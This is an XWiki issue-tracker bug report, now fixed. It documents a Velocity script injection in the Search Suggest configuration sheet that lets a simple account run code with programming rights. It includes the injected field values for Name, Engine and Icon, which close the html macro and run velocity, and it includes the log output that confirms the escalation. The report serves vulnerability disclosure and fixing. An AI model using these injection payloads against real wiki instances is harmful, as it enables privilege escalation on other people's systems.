Loading...

XML

Word

Printable

Details

Type: Bug
Resolution: Fixed
Priority: Blocker
Fix Version/s: 15.10.2, 15.5.5, 14.10.21
Affects Version/s: 9.2-rc-1
Component/s: Search - Generic
Labels:

Tests:

Unit
Difficulty:
Unknown
Documentation:
N/A
Documentation in Release Notes:
N/A
Similar issues:

Description

Steps to reproduce:

Edit your user profile or any other page with the object editor.
Add an object of type "Search Suggest Configuration"
Add an object of type "SearchSuggestSourceClass" and set the following values:
Name: $services.logging.getLogger("attacker").error("Hello from Name! I got programming: $services.security.authorization.hasAccess('programming')")
Engine:
```
{{/html}}{{async}}{{velocity}}$services.logging.getLogger("attacker").error("Hello from Engine! I got programming: $services.security.authorization.hasAccess('programming')"){{/velocity}}{{/async}}
```
Icon: $services.logging.getLogger("attacker").error("Hello from Icon! I got programming: $services.security.authorization.hasAccess('programming')")
Save and view the page you've edited.

Expected result:

No error log messages appear, the search suggest source is normally displayed.

Actual result:

The display is broken and the following log messages appear in XWiki's log:

2023-10-26 11:57:18,175 [qtp2134607032-13310 - http://localhost:1509/xwiki/bin/view/XWiki/username] ERROR attacker                       - Hello from Icon! I got programming: true 
2023-10-26 11:57:18,176 [qtp2134607032-13310 - http://localhost:1509/xwiki/bin/view/XWiki/username] ERROR attacker                       - Hello from Name! I got programming: true 
2023-10-26 11:57:18,192 [org.xwiki.rendering.async.internal.AsyncRendererJob@1f5f517c([async, macro, xwiki:XWiki.SearchSuggestConfigSheet, 9, author, xwiki:XWiki.superadmin, rendering.restricted, false, secureDocument, xwiki:XWiki.SearchSuggestConfigSheet, 401])] ERROR attacker                       - Hello from Engine! I got programming: true 
2023-10-26 11:57:18,192 [org.xwiki.rendering.async.internal.AsyncRendererJob@419b3704([async, macro, xwiki:XWiki.SearchSuggestConfigSheet, 25, author, xwiki:XWiki.superadmin, rendering.restricted, false, secureDocument, xwiki:XWiki.SearchSuggestConfigSheet, 402])] ERROR attacker                       - Hello from Engine! I got programming: true 
2023-10-26 11:57:18,192 [org.xwiki.rendering.async.internal.AsyncRendererJob@49416ca0([async, macro, xwiki:XWiki.SearchSuggestConfigSheet, 50, author, xwiki:XWiki.superadmin, rendering.restricted, false, secureDocument, xwiki:XWiki.SearchSuggestConfigSheet, 403])] ERROR attacker                       - Hello from Engine! I got programming: true 
2023-10-26 11:57:18,192 [org.xwiki.rendering.async.internal.AsyncRendererJob@4709f6cc([async, macro, xwiki:XWiki.SearchSuggestConfigSheet, 105, author, xwiki:XWiki.superadmin, rendering.restricted, false, secureDocument, xwiki:XWiki.SearchSuggestConfigSheet, 404])] ERROR attacker                       - Hello from Engine! I got programming: true

This demonstrates an escalation from a simple account to programming rights. This code exists at least since ~~XWIKI-14100~~ but might have existed before in another form.

The vulnerable code is in SearchSuggestConfigSheet.

Attachments

- Sort By Name
- Sort By Date
- Ascending
- Descending
- Thumbnails
- List
- Download All

image-2023-10-26-11-58-02-390.png
286 kB
26/Oct/23 11:58

Issue Links

depends on

XWIKI-21699 Add new API to help evaluate xobjects

Closed

links to

Security Advisory

Activity

People

Assignee:: Pierre Jeanjean

Reporter:: Michael Hamann

Votes:: 0 Vote for this issue

Watchers:: 1 Start watching this issue

Dates

Created:: 26/Oct/23 11:59

Updated:: 17/Jun/24 12:35

Resolved:: 18/Dec/23 10:45